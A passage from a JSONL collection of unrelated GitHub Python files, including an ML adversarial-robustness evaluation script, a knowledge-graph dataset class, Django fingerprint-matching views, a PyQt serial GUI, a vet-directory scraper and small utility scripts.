type=str, default=\"vuln\")\nparser.add_argument('--store_examples', type=int, default=0)\nargs = parser.parse_args()\n\ndefault_model_root = os.path.join(\".\",\"output\",args.dataset,\n \"train_{arch}_{dataset}_2021-01-20_19-18-12_9b01b470_trainset_{train}{aux}_testset_{test}_lambda_0.01_seed_42_lrs_120_140\")\nargs.model_root = default_model_root if args.model_root is None else args.model_root\nargs.timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H-%M-%S')\n\ndef run(args):\n\n args_dict = args.__dict__\n for a in args_dict.keys():\n val = args_dict.get(a)\n if isinstance(val,str):\n setattr(args,a,val.replace(\"\\r\", \"\"))\n\n experiment = init_comet(args,project_name=args.name) if args.name != \"#\" else None\n\n args.train_task_set, args.target_task_set, args.test_task_set, args.aux_task_set = \\\n abbrev_to_task(args.train_task_set), abbrev_to_task(args.target_task_set), abbrev_to_task(args.test_task_set), \\\n abbrev_to_task(args.aux_task_set)\n\n\n model = load_model(args)\n args.task_set = args.test_task_set\n target_task = args.target_task_set\n\n val_loader = get_loader(args, \"val\", out_name=True)\n criteria, tasks = get_losses_and_tasks(args)\n info = get_info(args.dataset)\n\n\n dict_losses2 = mtask_forone_advacc(val_loader, model, criteria, target_task, args, info, test_vis=True,\n norm=args.norm,comet=experiment)\n\n\n\nif __name__ == '__main__':\n\n if len(args.train_task_set) == 0:\n exit()\n\n if len(args.test_task_set) == 0:\n args.test_task_set = args.train_task_set\n\n if len(args.target_task_set) == 0:\n args.target_task_set = args.train_task_set\n\n if args.test_task_set.find(\"+\") >-1:\n args.train_task_set = args.train_task_set.split(\"+\")\n args.test_task_set = args.test_task_set.split(\"+\")\n args.target_task_set = args.target_task_set.split(\"+\")\n\n train_task_set, target_task_set, test_task_set = args.train_task_set, args.target_task_set, args.test_task_set\n print(len(train_task_set),len(target_task_set),len(test_task_set))\n\n last_failed = False\n for i, (train, target, test) in enumerate(zip(train_task_set, target_task_set, test_task_set)):\n print(\"### {i}/{l}: attacking {target} with model trained on {train}\".format(train=train,target=target,i=i,\n l=len(train_task_set)))\n args.train_task_set, args.target_task_set, args.test_task_set = train, target, test\n\n try:\n run(args)\n last_failed = False\n except Exception as e:\n if last_failed:\n print(i,\":\",e)\n raise e\n else:\n last_failed = True\n print(i,\":\",e)\n\n\n else:\n run(args)\n\n\n","repo_name":"yamizi/taskaugment","sub_path":"MTVulnerability/experiments/attacks/adv_attack.py","file_name":"adv_attack.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"1514595491","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/29 8:49 下午\n# @Author : HuangSir\n# @FileName: api.py\n# @Software: PyCharm\n# @Desc:\n\nfrom .routers import risk_router_init\nfrom fastapi import FastAPI\n\n\ndef create_app():\n app = FastAPI(title='风险评分模型',\n description=\"\"\"标准评分卡,集成树模型同时调,入参类别变量务必根据枚举值输入,否则报错. \\n\n 标准评分卡模型参数规范详情: lrData\\n\n 集成树模型参数规范详情: lgbData\n \"\"\",\n version='3.0')\n risk_router_init(app)\n return app\n","repo_name":"OverseasWork/ml_api_template","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10905304727","text":"import copy\nfrom collections import defaultdict\nimport numpy\nfrom dataset import Dataset\n\nclass KelpieDataset(Dataset):\n \"\"\"\n Since Datasets handle the correspondence between textual entities and ids,\n the KelpieDataset has the responsibility to decide the id of the kelpie entity (aka mimic in our paper)\n and to store the train, valid and test samples specific for the original entity and for the kelpie entity\n\n A KelpieDataset is never *loaded* from file: it is always generated from a pre-existing, already loaded Dataset.\n\n Nomenclature used in the KelpieDataset:\n - \"original entity\": the entity to explain the prediction of in the original Dataset;\n - \"clone entity\": a homologous mimic, i.e., a \"fake\" entity\n post-trained with the same training samples as the original entity\n - \"kelpie entity\": a non-homologous mimic, i.e., a \"fake\" entity\n post-trained with slightly different training samples from the original entity.\n (e.g. some training samples may have been removed, or added).\n \"\"\"\n\n def __init__(self,\n dataset: Dataset,\n entity_id: int):\n\n super(KelpieDataset, self).__init__(name=dataset.name,\n separator=dataset.separator,\n load=False)\n\n if dataset.num_entities == -1:\n raise Exception(\"The Dataset passed to initialize a KelpieDataset must be already loaded\")\n\n # the KelpieDataset is now basically empty (because load=False was used in the super constructor)\n # so we must manually copy (and sometimes update) all the important attributes from the original loaded Dataset\n self.num_entities = dataset.num_entities + 1 # adding the Kelpie entity to the count\n self.num_relations = dataset.num_relations\n self.num_direct_relations = dataset.num_direct_relations\n\n # copy relevant data structures\n self.to_filter = copy.deepcopy(dataset.to_filter)\n self.train_to_filter = copy.deepcopy(dataset.train_to_filter)\n self.entity_name_2_id = copy.deepcopy(dataset.entity_name_2_id)\n self.entity_id_2_name = copy.deepcopy(dataset.entity_id_2_name)\n self.relation_name_2_id = copy.deepcopy(dataset.relation_name_2_id)\n self.relation_id_2_name = copy.deepcopy(dataset.relation_id_2_name)\n\n # add the kelpie entity\n self.original_entity_id = entity_id\n self.original_entity_name = self.entity_id_2_name[self.original_entity_id]\n self.kelpie_entity_id = dataset.num_entities # add the kelpie entity to the dataset; it is always the last one\n self.kelpie_entity_name = \"kelpie_\" + self.original_entity_name\n self.entity_name_2_id[self.kelpie_entity_name] = self.kelpie_entity_id\n self.entity_id_2_name[self.kelpie_entity_id] = self.kelpie_entity_name\n\n # We do not copy all the triples and samples from the original dataset: the KelpieDataset DOES NOT NEED THEM.\n # The train, valid, and test samples of the KelpieDataset are generated using only those that featured the original entity!\n self.original_train_samples = self._extract_samples_with_entity(dataset.train_samples, self.original_entity_id)\n self.original_valid_samples = self._extract_samples_with_entity(dataset.valid_samples, self.original_entity_id)\n self.original_test_samples = self._extract_samples_with_entity(dataset.test_samples, self.original_entity_id)\n\n self.kelpie_train_samples = Dataset.replace_entity_in_samples(self.original_train_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_valid_samples = Dataset.replace_entity_in_samples(self.original_valid_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_test_samples = Dataset.replace_entity_in_samples(self.original_test_samples, self.original_entity_id, self.kelpie_entity_id)\n\n # update to_filter and train_to_filter data structures\n samples_to_stack = [self.kelpie_train_samples]\n if len(self.kelpie_valid_samples) > 0:\n samples_to_stack.append(self.kelpie_valid_samples)\n if len(self.kelpie_test_samples) > 0:\n samples_to_stack.append(self.kelpie_test_samples)\n all_kelpie_samples = numpy.vstack(samples_to_stack)\n for i in range(all_kelpie_samples.shape[0]):\n (head_id, relation_id, tail_id) = all_kelpie_samples[i]\n self.to_filter[(head_id, relation_id)].append(tail_id)\n self.to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n # if the sample was a training sample, also do the same for the train_to_filter data structure;\n # Also fill the entity_2_degree and relation_2_degree dicts.\n if i < len(self.kelpie_train_samples):\n self.train_to_filter[(head_id, relation_id)].append(tail_id)\n self.train_to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n\n # create a map that associates each kelpie train_sample to its index in self.kelpie_train_samples\n # this will be necessary to allow efficient removals and undoing removals\n self.kelpie_train_sample_2_index = {}\n for i in range(len(self.kelpie_train_samples)):\n cur_head, cur_rel, cur_tail = self.kelpie_train_samples[i]\n self.kelpie_train_sample_2_index[(cur_head, cur_rel, cur_tail)] = i\n\n\n # initialize data structures needed in the case of additions and/or removals;\n # these structures are required to undo additions and/or removals\n self.kelpie_train_samples_copy = copy.deepcopy(self.kelpie_train_samples)\n\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n # override\n def add_training_samples(self, samples_to_add: numpy.array):\n \"\"\"\n Add a set of training samples to the training samples of the kelpie entity of this KelpieDataset.\n The samples to add must still feature the original entity id; this method will convert them before addition.\n The KelpieDataset will keep track of the last performed addition so it can be undone if necessary\n calling the undo_last_training_samples_addition method.\n\n :param samples_to_add: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_add:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_added_samples = samples_to_add\n self.last_added_samples_number = len(samples_to_add)\n\n # reset all data structures needed to undo additions. We only want to keep track of the *last* addition.\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n kelpie_samples_to_add = Dataset.replace_entity_in_samples(samples_to_add,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n for (cur_head, cur_rel, cur_tail) in kelpie_samples_to_add:\n self.to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.last_added_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_additions[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_additions[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.kelpie_train_samples = numpy.vstack((self.kelpie_train_samples, numpy.array(kelpie_samples_to_add)))\n\n\n def undo_last_training_samples_addition(self):\n \"\"\"\n This method undoes the last addition performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the additions performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n\n if self.last_added_samples_number <= 0:\n raise Exception(\"No addition to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_additions:\n for x in self.last_filter_additions[key]:\n self.to_filter[key].remove(x)\n self.train_to_filter[key].remove(x)\n\n # reset the data structures used to undo additions\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n\n # override\n def remove_training_samples(self, samples_to_remove: numpy.array):\n \"\"\"\n Remove some training samples from the kelpie training samples of this KelpieDataset.\n The samples to remove must still feature the original entity id; this method will convert them before removal.\n The KelpieDataset will keep track of the last performed removal so it can be undone if necessary.\n\n :param samples_to_remove: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_remove:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_removed_samples = samples_to_remove\n self.last_removed_samples_number = len(samples_to_remove)\n\n # reset data structures needed to undo removals. We only want to keep track of the *last* removal.\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n kelpie_train_samples_to_remove = Dataset.replace_entity_in_samples(samples=samples_to_remove,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id,\n as_numpy=False)\n\n # update to_filter and train_to_filter\n for (cur_head, cur_rel, cur_tail) in kelpie_train_samples_to_remove:\n self.to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n\n # and also update the data structures required for undoing the removal\n self.last_removed_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_removals[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_removals[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n # get the indices of the samples to remove in the kelpie_train_samples structure\n # and use them to perform the actual removal\n kelpie_train_indices_to_remove = [self.kelpie_train_sample_2_index[x] for x in kelpie_train_samples_to_remove]\n self.kelpie_train_samples = numpy.delete(self.kelpie_train_samples, kelpie_train_indices_to_remove, axis=0)\n\n\n def undo_last_training_samples_removal(self):\n \"\"\"\n This method undoes the last removal performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the removals performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n if self.last_removed_samples_number <= 0:\n raise Exception(\"No removal to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_removals:\n for x in self.last_filter_removals[key]:\n self.to_filter[key].append(x)\n self.train_to_filter[key].append(x)\n\n # reset the data structures used to undo additions\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n def as_kelpie_sample(self, original_sample):\n if not self.original_entity_id in original_sample:\n raise Exception(\"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(original_sample))\n return Dataset.replace_entity_in_sample(sample=original_sample,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n\n def as_original_sample(self, kelpie_sample):\n if not self.kelpie_entity_id in kelpie_sample:\n raise Exception(\n \"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(kelpie_sample))\n return Dataset.replace_entity_in_sample(sample=kelpie_sample,\n old_entity=self.kelpie_entity_id,\n new_entity=self.original_entity_id)\n\n\n ### private utility methods\n @staticmethod\n def _extract_samples_with_entity(samples, entity_id):\n return samples[numpy.where(numpy.logical_or(samples[:, 0] == entity_id, samples[:, 2] == entity_id))]","repo_name":"AndRossi/Kelpie","sub_path":"kelpie_dataset.py","file_name":"kelpie_dataset.py","file_ext":"py","file_size_in_byte":14658,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"66"} +{"seq_id":"22908961665","text":"from django.db.models import Q\nfrom drf_spectacular.utils import extend_schema_view, extend_schema\nfrom rest_framework import status\nfrom rest_framework.exceptions import ParseError\nfrom rest_framework.generics import DestroyAPIView, GenericAPIView, \\\n get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom fingerprints.models.enrollment import Finger\nfrom fingerprints.serializers.api.identification import FingerDetailSerializer, \\\n FingerIdentifySerializer, FingerVerifySerializer\nfrom fingerprints.tools.board_sync import BoardSyncService\n\nfrom fingerprints.tools.matcher.identification import FingerMatcher\nfrom persons.models import Person\n\n\n@extend_schema_view(\n post=extend_schema(summary='Identify', tags=['Fingerprints: Identification']),\n)\nclass FingerIdentifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerIdentifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n templates = Finger.get_template_values(status_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not identified.'\n )\n if response == 0:\n qs = Finger.objects.filter(\n iso_fmr_data=templates[template_index.value],\n )\n instance = qs.first()\n serializer = FingerDetailSerializer(instance).data\n return Response(serializer, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n@extend_schema_view(\n post=extend_schema(summary='Verify', tags=['Fingerprints: Identification']),\n)\nclass FingerVerifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerVerifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n board_id_data = request.data.get('board_id')\n templates = Finger.get_template_values(status_data, board_id_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not verified.'\n )\n if response == 0:\n return Response({'detail': 'Verified'}, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n#\n@extend_schema_view(\n delete=extend_schema(summary='Destroy', tags=['Fingerprints: Identification']),\n)\nclass PersonDestroyView(DestroyAPIView):\n permission_classes = [AllowAny]\n queryset = Person.objects.all()\n serializer_class = None\n\n def get_object(self):\n instance = get_object_or_404(\n Person,\n Q(\n status=self.request.data.get('status'),\n board_id=self.request.data.get('board_id'),\n )\n )\n return instance\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n BoardSyncService().destroy_in_board(instance)\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"mr-Marshanskiy/suprema_fingerprint_matcher","sub_path":"fingerprints/views/identification.py","file_name":"identification.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40351319713","text":"import PyQt5\nimport PyQt5.QtGui\nfrom PyQt5.QtGui import QIcon\nimport pyqtgraph\nfrom pyqtgraph import PlotWidget\nfrom PyQt5 import QtWidgets, uic\nimport sys\nimport serial.tools.list_ports\nimport time\nimport serial\nfrom PyQt5.QtSerialPort import QSerialPort, QSerialPortInfo\nfrom PyQt5.QtCore import QIODevice\n\nimport os ,sys \n\nbasedir = os.path.dirname(__file__)\ntry:\n from ctypes import windll # Only exists on Windows.\n myappid = 'mycompany.myproduct.subproduct.version'\n windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\nexcept ImportError:\n pass\n\n\napp = QtWidgets.QApplication([])\nui = uic.loadUi(os.path.join(basedir,'Casper_v2.ui'))\nui.setWindowTitle(\"Casper Test GUI\")\n\n\nserial = QSerialPort()\nserial.setBaudRate(115200)\nportList = []\nports = QSerialPortInfo().availablePorts()\nfor port in ports:\n portList.append(port.portName())\nui.comboBox_3.addItems(portList)\nui.comboBox_4.addItems(portList)\n\n\nui.widget_1.setLabel('bottom', 'Time (S) ')\nui.widget_1.setLabel('left', 'Temp (C)')\n\n\n\npressure = list()\ngtime = list()\ni = 0\n\ndef onRead():\n global i\n if not serial.canReadLine(): return \n rx = serial.readLine()\n rxs = str(rx, 'utf-8').strip()\n gtime.append(i)\n pressure.append(float(rxs))\n i = i+1\n ui.label_162.setText(rxs)\n ui.widget_1.plot(gtime, pressure)\n \n \n \n \n\ndef Open_Button():\n serial.setPortName(ui.comboBox_3.currentText())\n serial.setPortName(ui.comboBox_4.currentText())\n serial.open(QIODevice.ReadWrite)\ndef Close_Button():\n serial.close()\n\n\n\nserial.readyRead.connect(onRead)\nui.pushButton_6.clicked.connect(Open_Button)\nui.pushButton_5.clicked.connect(Close_Button)\nui.pushButton_8.clicked.connect(Open_Button)\nui.pushButton_7.clicked.connect(Close_Button)\n\n\n\n\nui.setWindowIcon(QIcon(os.path.join(basedir,\"Screenshot_20210202-191737_Video_Player.ico\")))\nui.show()\napp.exec()","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/GroundStation/Casper_v2.py","file_name":"Casper_v2.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41921104320","text":"N = int(input())\nlst = list(map(int, input().split()))\ncost = [0] + lst\n\ndp = [0] * (N+1)\ndp[1] = cost[1]\n\nfor i in range(2, N+1):\n for j in range(0, i+1):\n dp[i] = max(dp[i], cost[i-j]+dp[j])\n\nprint(dp[N])","repo_name":"20SKKUAlgo/BAEKJOON","sub_path":"JooEun/23Feb/0228/p11052.py","file_name":"p11052.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39683842016","text":"from __future__ import annotations\n\nimport argparse\nfrom typing import Sequence\n\nfrom all_repos import autofix_lib\nfrom all_repos.config import Config\n\n\ndef find_repos(_: Config) -> list[str]:\n raise AssertionError('--repos is required')\n\n\ndef main(argv: Sequence[str] | None = None) -> int:\n parser = argparse.ArgumentParser(\n description='Interactively apply a manual change across repos.',\n usage='%(prog)s [options]',\n )\n autofix_lib.add_fixer_args(parser)\n parser.add_argument(\n '--branch-name', default='all-repos-manual',\n help='override the autofixer branch name (default `%(default)s`).',\n )\n parser.add_argument(\n '--commit-msg', '--commit-message', required=True,\n help='set the autofixer commit message.',\n )\n args = parser.parse_args(argv)\n\n # force interactive\n args.interactive = True\n\n repos, config, commit, autofix_settings = autofix_lib.from_cli(\n args,\n find_repos=find_repos,\n msg=args.commit_msg,\n branch_name=args.branch_name,\n )\n\n autofix_lib.fix(\n repos,\n apply_fix=autofix_lib.shell,\n config=config,\n commit=commit,\n autofix_settings=autofix_settings,\n )\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"asottile/all-repos","sub_path":"all_repos/manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":483,"dataset":"github-code","pt":"66"} +{"seq_id":"10033341225","text":"# файл, позволяющий работать с config.json\r\nimport json\r\n\r\n\r\nclass Config:\r\n def __init__(self):\r\n self.file = \"config.json\"\r\n configFile = open(self.file, \"r\")\r\n self.config = json.load(configFile)\r\n configFile.close()\r\n\r\n def getConfigVar(self, variable):\r\n if variable in self.config.keys():\r\n return self.config[variable]\r\n\r\n def setConfigVar(self, variable, arg):\r\n if variable in self.config.keys():\r\n self.config[variable] = arg\r\n with open(self.file, 'w') as config:\r\n config.write(json.dumps(self.config, separators=(',\\n', ': ')))\r\n","repo_name":"Dan4oby/Modular-ABot","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4417729569","text":"from typing import Optional\nfrom validation.validate import required_keys_present, values_correct_type\n\n\ndef validate(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals post request\n is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n {\n \"comment\": \"here is a comment\",\n \"patientId\": \"123\",\n \"referralHealthFacilityName\": \"H0000\",\n }\n :return: An error message if request body in invalid in some way. None otherwise.\n \"\"\"\n error_message = None\n\n error_message = required_keys_present(\n request_body,\n [\n \"patientId\",\n \"referralHealthFacilityName\",\n ],\n )\n\n if error_message is not None:\n return error_message\n\n all_fields = [\n \"id\",\n \"dateReferred\",\n \"actionTaken\",\n \"isAssessed\",\n \"isCancelled\",\n \"cancelReason\",\n \"notAttended\",\n \"notAttendReason\",\n \"lastEdited\",\n \"userId\",\n \"comment\",\n \"patientId\",\n \"referralHealthFacilityName\",\n ]\n\n for key in request_body:\n if key not in all_fields:\n return \"The key '\" + key + \"' is not a valid field or is set server-side\"\n\n return error_message\n\n\ndef validate_cancel_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/cancel-status-switch/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\"isCancelled\", \"cancelReason\"]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"isCancelled\"], bool)\n if error:\n return error\n\n error = values_correct_type(request_body, [\"cancelReason\"], str)\n if error:\n return error\n\n\ndef validate_not_attend_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/not-attend/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\n \"notAttendReason\",\n ]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"notAttendReason\"], str)\n if error:\n return error\n","repo_name":"drbfraser/CRADLE-Platform","sub_path":"server/validation/referrals.py","file_name":"referrals.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"23698578882","text":"import csv\r\nimport threading\r\nimport time\r\nfrom dataclasses import dataclass, astuple, fields\r\n\r\n\r\nimport requests\r\n\r\nBASE_URL = \"https://www.zooplus.de/tierarzt/results\"\r\n\r\nOUTPUT_CSV_PATH = \"doctors.csv\"\r\n\r\n\r\n@dataclass\r\nclass Doctor:\r\n full_name: str\r\n clinic: str\r\n open_time: str\r\n address: str\r\n rating: int\r\n num_of_reviews: int\r\n\r\n\r\nDOCTORS_FIELDS = [field.name for field in fields(Doctor)]\r\n\r\n\r\ndef parse_one_doctor(doctor) -> Doctor:\r\n return Doctor(\r\n full_name=doctor[\"name\"],\r\n clinic=doctor[\"subtitle\"]\r\n if \"subtitle\" in doctor\r\n else \"sorry, we don't have this information\",\r\n open_time=doctor[\"open_time\"],\r\n address=doctor[\"address\"],\r\n rating=doctor[\"avg_review_score\"],\r\n num_of_reviews=doctor[\"count_reviews\"],\r\n )\r\n\r\n\r\ntoken = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/token?debug=authReduxMiddleware-tokenIsExpired\"\r\n).json()[\"token\"]\r\nheaders = {\"authorization\": f\"Bearer {token}\"}\r\n\r\n\r\ndef get_doctors(num):\r\n all_doctors = []\r\n attribute_from = 0\r\n attribute_page = 1\r\n\r\n page = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/results\",\r\n params={\r\n \"animal_99\": True,\r\n \"page\": {attribute_page},\r\n \"from\": {attribute_from},\r\n \"size\": 20,\r\n },\r\n headers=headers,\r\n )\r\n content = page.json()\r\n\r\n attribute_from += 20\r\n all_doctors += [parse_one_doctor(doctor) for doctor in content[\"results\"]]\r\n\r\n with open(OUTPUT_CSV_PATH, \"w\", encoding=\"utf-8\") as file:\r\n writer = csv.writer(file)\r\n writer.writerow(DOCTORS_FIELDS)\r\n writer.writerows([astuple(doctor) for doctor in all_doctors])\r\n\r\n\r\ndef main_threads():\r\n tasks = []\r\n\r\n for num in range(1, 6):\r\n tasks.append(threading.Thread(target=get_doctors, args=(num,)))\r\n tasks[-1].start()\r\n\r\n for task in tasks:\r\n task.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start_time = time.perf_counter()\r\n main_threads()\r\n end_time = time.perf_counter()\r\n print(\"Elapsed:\", end_time - start_time)\r\n","repo_name":"anastasia-martyniuk/scraping_zooplus","sub_path":"parse_with_threads.py","file_name":"parse_with_threads.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14067372746","text":"import numpy as np\nfrom mapping import mapping_3p3um_80nm as mapping\nfrom functions import mapping_functions as mf\nimport importlib\nfrom tqdm import tqdm\n\n# %%\nmapping = importlib.reload(mapping)\nmf = importlib.reload(mf)\n\nscission_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/scission_matrix.npy')\nresist_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/resist_matrix.npy')\nchain_lens = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_lens.npy')\nn_chains = len(chain_lens)\n\nchain_tables = []\nprogress_bar = tqdm(total=n_chains, position=0)\n\nfor n in range(n_chains):\n chain_tables.append(\n np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_tables/chain_table_' +\n str(n) + '.npy'))\n progress_bar.update()\n\nresist_shape = mapping.hist_5nm_shape\n\nmf.process_mapping(scission_matrix, resist_matrix, chain_tables)\nzip_length = 1000\nmf.process_depolymerization(resist_matrix, chain_tables, zip_length)\n\n# %%\nfor ct in chain_tables:\n if len(np.where(ct[:, -1] == 10)[0]) > 0:\n break\n","repo_name":"fedorsidorov/MC_simulation","sub_path":"notebooks/tests/test_depolymerization.py","file_name":"test_depolymerization.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19790845471","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('mnnb', views.mnnb, name='mnnb'),\r\n path('post_mnnb', views.post_mnnb, name='post_mnnb'),\r\n \r\n path('lreg', views.lreg, name='lreg'),\r\n path('post_lreg', views.post_lreg, name='post_lreg'),\r\n \r\n path('svm', views.svm, name='svm'),\r\n path('post_svm', views.post_svm, name='post_svm'),\r\n \r\n path('nltk', views.nltk, name='nltk'),\r\n path('post_nltk', views.post_nltk, name='post_nltk'),\r\n]","repo_name":"Siratigui/django-classifiers","sub_path":"spc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8166890105","text":"import numpy as np \nfrom matplotlib import pyplot as plt \n\ndef epsilon(n, alpha=0.05):\n\treturn np.sqrt(1/(2*n) * np.log(2/alpha))\n\ndef pn(n, p=0.4):\n\tX = [1 if np.random.rand()

